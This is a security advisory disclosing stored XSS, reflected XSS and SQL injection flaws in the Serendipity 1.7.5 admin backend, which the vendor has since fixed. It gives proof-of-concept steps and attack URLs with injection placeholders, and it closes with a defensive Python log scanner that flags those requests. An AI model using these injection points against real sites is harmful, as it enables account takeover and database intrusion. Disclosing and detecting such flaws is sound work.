Advisory: Serendipity 1.7.5 - Multiple security vulnerabilities
Advisory ID: SSCHADV2014-003
Author: Stefan Schurtz
Affected Software: Successfully tested on Serendipity 1.7.5
Vendor URL: http://www.s9y.org/
Vendor Status: fixed
==========================
Vulnerability Description
==========================
The Serendipity 1.7.5 backend is prone to multiple security vulnerabilities.
==========================
PoC-Exploit
==========================
// Stored-XSS with "Real name"
(1) Login as "Standard editor" user
(2) Under "Personal Settings" set your "Real name" to ">
The XSS is executed in the Administrator's browser when they manage the users (Backend -> Administration -> Manage users).
// SQL-Injection - with "serendipity[install_plugin]"
http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=serendipity_event_spamblock&serendipity[install_plugin]=[SQLi]
// Reflected XSS_1 - "serendipity[install_plugin]"
http://[target]/s/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524'%3b%2f%2f912
// Reflected XSS_2 - "serendipity[id]"
POST http://[target]/serendipity/serendipity_admin.php?
serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=">
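As an added, defender-side example (not part of the advisory), the following Python scans constructed access-log lines for requests to serendipity_admin.php whose serendipity[install_plugin] or serendipity[id] values do not fit the shape those parameters should carry. The allowed shapes (identifier-like plugin names, numeric entry ids) and the sample log lines are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an Apache/nginx combined-format access log entry.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# Parameters the advisory names as injection points. The allowed shapes are
# assumptions for this example: plugin names are identifier-like, entry ids numeric.
ALLOWED = {
    "serendipity[install_plugin]": re.compile(r"^[A-Za-z0-9_]*$"),
    "serendipity[id]": re.compile(r"^[0-9]*$"),
}

def suspicious_params(request_target):
    """Return [(param, decoded_value)] for advisory parameters whose value does
    not fit the expected shape; [] if the target is not the admin script."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/serendipity_admin.php"):
        return []
    findings = []
    # parse_qs percent-decodes names (%5B -> [) as well as values, so the GET and
    # POST request shapes in the advisory map to the same parameter names.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        pattern = ALLOWED.get(name)
        if pattern is None:
            continue
        findings.extend((name, v) for v in values if not pattern.match(v))
    return findings

def scan_access_log(lines):
    """Return [(line_number, client_ip, param, value)] for each flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        ip = line.split(" ", 1)[0]
        for name, value in suspicious_params(m.group("target")):
            hits.append((n, ip, name, value))
    return hits

# Constructed sample log lines modelled on the request shapes in the advisory.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2014:09:00:00 +0000] "GET /serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=serendipity_event_spamblock&serendipity[install_plugin]=serendipity_event_spamblock HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Mar/2014:09:00:01 +0000] "GET /serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524\'%3b%2f%2f912 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Mar/2014:09:00:02 +0000] "POST /serendipity/serendipity_admin.php?serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=%22%3E HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("line %d from %s: %s = %r" % hit)
```

The first sample line is a legitimate plugin installation and is not flagged; the other two carry the quote and angle-bracket characters that a plugin name or entry id never needs.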